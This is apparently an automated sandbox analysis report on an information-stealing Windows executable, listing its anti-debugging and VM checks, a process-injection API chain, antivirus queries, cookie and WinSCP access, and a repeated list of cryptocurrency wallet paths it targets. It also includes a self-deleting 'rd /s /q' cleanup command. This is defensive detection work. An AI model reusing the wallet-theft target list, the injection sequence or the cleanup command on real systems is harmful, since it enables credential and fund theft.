                              Source: GCAKKE.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: GCAKKE.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: GCAKKE.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: GCAKKE.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: GCAKKE.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: out.exe, 00000000.00000002.2676579434.0000000002F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                              Source: GCAKKE.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: GCAKKE.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: GCAKKE.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: GCAKKE.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: C:\Users\user\Desktop\out.exeAPI call chain: ExitProcess graph end nodegraph_0-73093
                              Source: C:\Users\user\Desktop\out.exeAPI call chain: ExitProcess graph end nodegraph_0-73077
                              Source: C:\Users\user\Desktop\out.exeAPI call chain: ExitProcess graph end nodegraph_0-74417
                              Source: C:\Users\user\Desktop\out.exe Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0003D016
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_000214AD mov eax, dword ptr fs:[00000030h]0_2_000214AD
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002148A mov eax, dword ptr fs:[00000030h]0_2_0002148A
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_000214A2 mov eax, dword ptr fs:[00000030h]0_2_000214A2
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003859A mov eax, dword ptr fs:[00000030h]0_2_0003859A
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00038599 mov eax, dword ptr fs:[00000030h]0_2_00038599
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00031807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,0_2_00031807
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0003D98C
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0004762E SetUnhandledExceptionFilter,0_2_0004762E
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C44B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C44B66C
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C44B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C44B1F7
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C5FAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C5FAC62

                              HIPS / PFW / Operating System Protection Evasion

                              Source: Yara matchFile source: out.exe, type: SAMPLE
                              Source: Yara matchFile source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_0002F54A
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_000324A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_000324A8
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_0003257F
                              Source: C:\Users\user\Desktop\out.exeCode function: ??_U@YAPAXI@Z,OpenProcess,_memset,ReadProcessMemory,_memset,??_V@YAXPAX@Z, t.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon0_2_0002FB2D
                              Source: C:\Users\user\Desktop\out.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKEBFHIJECFI" & exit
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002111D cpuid 0_2_0002111D
                              Source: C:\Users\user\Desktop\out.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00030DDB
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0004B0CC
                              Source: C:\Users\user\Desktop\out.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_0004B1C1
                              Source: C:\Users\user\Desktop\out.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00049A50
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_0004B268
                              Source: C:\Users\user\Desktop\out.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_0004B2C3
                              Source: C:\Users\user\Desktop\out.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_0004AB40
                              Source: C:\Users\user\Desktop\out.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_000453E3
                              Source: C:\Users\user\Desktop\out.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_0004B494
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_0004749C
                              Source: C:\Users\user\Desktop\out.exeCode function: EnumSystemLocalesA,0_2_0004B556
                              Source: C:\Users\user\Desktop\out.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00049D6E
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_0004E56F
                              Source: C:\Users\user\Desktop\out.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00047576
                              Source: C:\Users\user\Desktop\out.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0004B580
                              Source: C:\Users\user\Desktop\out.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00048DC4
                              Source: C:\Users\user\Desktop\out.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0004B5E7
                              Source: C:\Users\user\Desktop\out.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_0004B623
                              Source: C:\Users\user\Desktop\out.exeCode function: GetLocaleInfoA,0_2_0004E6A4
                              Source: C:\Users\user\Desktop\out.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\Desktop\out.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,0_2_0003C0E9
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00030C53 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00030C53
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00030D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00030D2E
                              Source: C:\Users\user\Desktop\out.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: out.exe, 00000000.00000002.2676579434.0000000002F2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\Desktop\out.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                              Stealing of Sensitive Information

                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: out.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: window-state.json
                              Source: out.exe, 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.000000000300D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
                              Source: C:\Users\user\Desktop\out.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                              Source: C:\Users\user\Desktop\out.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
